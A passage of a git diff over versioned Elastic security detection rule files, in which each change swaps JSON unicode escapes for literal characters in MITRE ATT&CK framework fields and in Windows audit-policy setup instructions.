"severity": "high", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_108.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_108.json index b92c8d40eaa..0c913a1c8a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_108.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_109.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_109.json index 5739ce39eb9..78f012f897f 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_109.json +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_109.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", - "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_110.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_110.json index be9735d0a60..63374d5c4a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_110.json +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_110.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", - "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_111.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_111.json index 93b380ce015..e9e6c3adaec 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_111.json +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_111.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", - "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```\n", + "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_102.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_102.json index 495f873c2db..7fb7b59ad42 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_102.json +++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_103.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_103.json index 011bf3d8473..b2befb9c1c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_103.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_104.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_104.json index b37cb9539b9..ffae2965c5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_104.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_105.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_105.json index ccb4175ae32..c0aec0b95d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_105.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_206.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_206.json index d49ca7d77fe..aa2abca750c 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_206.json +++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_206.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_207.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_207.json index 61b2401bab4..a53dfd78301 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_207.json +++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_207.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_105.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_105.json index 7094f7221fe..34d0eedcd84 100644 --- a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_205.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_205.json index c8ea371bb36..4e02399ba6f 100644 --- a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_205.json +++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_205.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_206.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_206.json index f5185971a41..dffd9ee0b47 100644 --- a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_206.json +++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_206.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_207.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_207.json index 2b38945e7f1..4c0c4dce48f 100644 --- a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_207.json +++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_207.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_308.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_308.json index cd0745cbab6..00ae50879a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_308.json +++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_308.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_5.json b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_5.json index ff3b20a472c..5c904f032a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_5.json +++ b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_5.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_6.json b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_6.json index d788915f2a9..393d8b4eca2 100644 --- a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_6.json +++ b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_6.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_7.json b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_7.json index 770ad3c7436..9ca3c8d91e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_7.json +++ b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_7.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_8.json b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_8.json index 135b69c4c48..078725a11b2 100644 --- a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_8.json +++ b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_8.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_1.json b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_1.json index c3ef848e316..b03888782fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_1.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_2.json b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_2.json index 17d8b28e598..731833f10a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_2.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_104.json b/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_104.json index 655541c9248..f9bef8cf616 100644 --- a/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_104.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_105.json b/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_105.json index 75b86dd2230..5c758ea581c 100644 --- a/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_103.json b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_103.json index 1c9fc1cb031..1b3e2695e4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_104.json b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_104.json index 674b9dc6454..edff695dd60 100644 --- a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_105.json b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_105.json index 1ac7925ba44..97254e98704 100644 --- a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_105.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_103.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_103.json index 12c54b2f33f..1699e6df527 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_104.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_104.json index f4cf62692e9..0fa2749322b 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_105.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_105.json index 15ac4fd063e..dd600686b62 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_106.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_106.json index 454ca957de7..5267ca0dade 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_106.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_107.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_107.json index 97c719372e8..967ce71ee64 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_107.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_103.json b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_103.json index 1491d84e404..38759ffd3a3 100644 --- a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_103.json @@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "a16612dd-b30e-4d41-86a0-ebe70974ec00", - "setup": "This is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "This is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_104.json b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_104.json index 55e9d74481d..9919088abe6 100644 --- a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_104.json @@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "a16612dd-b30e-4d41-86a0-ebe70974ec00", - "setup": "This is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "This is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_105.json b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_105.json index c3965a48384..c3e483d519c 100644 --- a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_105.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "a16612dd-b30e-4d41-86a0-ebe70974ec00", - "setup": "\nThis is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nThis is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_2.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_2.json index c16b1a2398f..d03ed95a84a 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_2.json +++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_2.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_3.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_3.json index 757f14c38cf..62f60aaaafe 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_3.json +++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_3.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git 